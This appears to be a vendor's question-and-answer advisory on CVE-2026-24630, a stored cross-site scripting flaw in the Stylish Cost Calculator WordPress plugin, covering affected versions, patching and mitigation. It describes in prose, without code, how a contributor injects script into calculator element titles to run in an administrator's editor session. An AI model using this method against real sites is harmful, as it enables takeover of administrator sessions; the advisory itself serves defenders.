CVE-2026-24630 is a stored cross-site scripting (XSS) vulnerability in the Stylish Cost Calculator plugin for WordPress, affecting versions up to 8.1.9. It allows authenticated users with contributor-level access or higher to inject arbitrary JavaScript into the plugin, which executes when administrators view the affected pages.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization in the plugin’s code. Authenticated attackers can submit crafted requests that include malicious JavaScript code in element titles, which is then stored in the database and executed when an administrator accesses the calculator editor interface.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Stylish Cost Calculator plugin version 8.1.9 or earlier is affected. Specifically, users with contributor-level access or higher can exploit this vulnerability, potentially impacting site administrators and their data.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the Stylish Cost Calculator plugin installed on your WordPress site. If it is version 8.1.9 or earlier, your site is vulnerable. Additionally, review any user accounts with contributor permissions or higher that could exploit this flaw.
How can I fix this vulnerability?
Recommended actions
The vulnerability can be fixed by updating the Stylish Cost Calculator plugin to version 8.2.1 or later, where the issue has been patched. Regularly check for updates to all plugins and themes to ensure security against known vulnerabilities.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Stylish Cost Calculator plugin until a patch can be applied. Additionally, review user permissions and limit access to trusted users only to reduce the risk of exploitation.
What does a CVSS score of 6.4 indicate?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while authentication is required to exploit the vulnerability, the potential impact on the site can be significant, including privilege escalation or site takeover.
What are the practical risks of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of administrator sessions. This could lead to data theft, unauthorized changes to the site, or even complete control over the site, depending on the attacker’s objectives.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept outlines a method for exploiting the vulnerability by logging into a vulnerable WordPress site as a contributor and injecting a malicious script into the calculator element title. This script will execute when an administrator accesses the calculator editor, showcasing the risk of stored XSS.
What steps should I take after updating the plugin?
Post-update actions
After updating the plugin, review user accounts and permissions to ensure that only trusted users have contributor or higher access. Monitor your site for any unusual activity and consider conducting a security audit to identify any other potential vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-24630 can be found on the official CVE database, security advisories from the plugin author, and security blogs that cover WordPress vulnerabilities. Staying informed through these resources can help maintain your site’s security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations